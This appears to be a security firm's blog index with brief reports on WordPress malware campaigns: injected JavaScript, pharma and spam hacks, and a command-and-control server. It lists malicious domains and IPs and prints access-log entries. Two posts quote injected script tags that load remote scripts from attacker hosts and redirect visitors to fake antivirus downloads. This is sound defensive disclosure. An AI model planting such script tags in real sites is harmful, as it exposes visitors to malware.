Malware update – Alex Bodrov – awaue.com,etc

We will be posting some quick malware updates on our blog from now on. The latest one that is affecting quite a few sites are malicious javascripts being injected directly into the wp-posts table on WordPress sites. Those are the domains being used:

http://aeaaea.com/ou

http://secree.com/re

http://uoauer.com/si

http://oeooea.com/ve

http://secowo.com/wo

Those were used in the first batch of attacks that happened a few weeks (months) ago:

http://ae.awaue.com

http://ie.eracou.com

http://ao.euuaw.com

Details about the malware:
http://sucuri.net/malware/entry/MW:RKS:3

For hosting providers/security companies: Block the IP address 91.188.59.203 – (it is hosting all those sites).

Read More

Hilary Kneber (part XI) – sippa.dottasink.net

Hilary Kneber (hilarykneber@yahoo.com) is at it again. We’ve been detecting various sites infected with a malicious javascript pointing to http://sippa.dottasink.net:

< script src = "http://sippa.dottasink.net/music/indi.php”></script>

This redirects any visitor of the hacked site to http:// www3.pc-cleaner40. co.cc, where the famous “fake AV” virus will be offered to him.

And guess who registered that domain?

Read More

More spam: Google-traffic-analytics.com C&C server

We have been tracking another wave of SPAM that is affecting many popular web sites. What is interesting is all of them have been controlled by just one site: http://www.google-traffic-analytics.com.

And when this site went down, guess what is showing up on Google:


Read More

Gmail blacklisted by Spamhaus

Update: Gmail not blacklisted anymore.

It seems that today Spamhaus (a widely used Spam blacklist) started to blacklist the IP addresses used by gmail. We got this notification via our blacklist monitor:

< OK: Host www.gmail.com clean.

> WARN: http://www.spamhaus.org/query/bl?ip=74.125.227.21
> WARN: Host www.gmail.com blacklisted.

Digging further:

$ host gmail.com
gmail.com has address 74.125.227.24
gmail.com has address 74.125.227.21
gmail.com has address 74.125.227.22
gmail.com has address 74.125.227.23


Read More

Pharma hack and their C&C (Command & control) server

A large portion of the sites Sucuri has been fixing in recent weeks are stemming from infections caused by the infamous Pharma Hack. We posted a detailed document explaining how to fix it and clean the attack:

Understanding and cleaning the pharma hack on WordPress

One thing we’ve noticed on all sites affected so far is that all of them have been receiving commands from this IP address: 94.76.241.4 (curingin.com).

If your site has been affected you can double check your access.log for these entries:

94.76.241.4 – – [31/Jul/2010:06:07:59 -0700] “POST /wp-content/themes/classic/sidebar.php HTTP/1.1″ 500 374 “-” “-”
94.76.241.4 – – [31/Jul/2010:06:08:30 -0700] “POST /wp-content/themes/classic/sidebar.php HTTP/1.1″ 500 447 “-” “-”
94.76.241.4 – – [31/Jul/2010:11:06:55 -0700] “POST /wp-content/themes/classic/sidebar.php HTTP/1.1″ 500 444 “-” “-”
94.76.241.4 – – [30/Jul/2010:12:57:41 -0700] “POST /wp-content/themes/classic/comments.php HTTP/1.1″ 200 202 “-” “-”

This IP is hosted at Blueconnex and even after tons of abuse reports (from multiple sources), the’ve sat idle.

$ whois 94.76.241.4
route: 94.76.192.0/18
descr: Blueconnex Networks Ltd
origin: AS29550


Read More

Yet another series of attacks (part X) – vancouvererrorsonfile.com and the hilarykneber group

If you have been following our blog long, you probably heard about quite a few large scale attacks affecting many hosting companies: GoDaddy, Bluehost, Dreamhost, etc, etc.

The new one that started to spread today uses a javascript file pointing to http://vancouvererrorsonfile.com/js2.php. When called, it will load www4.meowmeow4.co.cc and then offer the famous “fake AV” virus to the end user of a site. That’s how it looks like in a site:

< script src =" http://vancouvererrorsonfile.com/js2.php

Or in our scanner (blueh2):

Read More

Cleaning the “siteurlpath” hack on WordPress (wplinksforwork and hemoviestube spam bots)

Recently we started to see a lot of WordPress sites hacked with malware hidden inside the wp_options -> siteurlpath table. The symptoms are very similar to the pharma hack (lots of SPAM hidden in the site), but in this case the SPAM is displayed to all users, not only search engines.

This is how an affected site looks like on our scanner:



Read More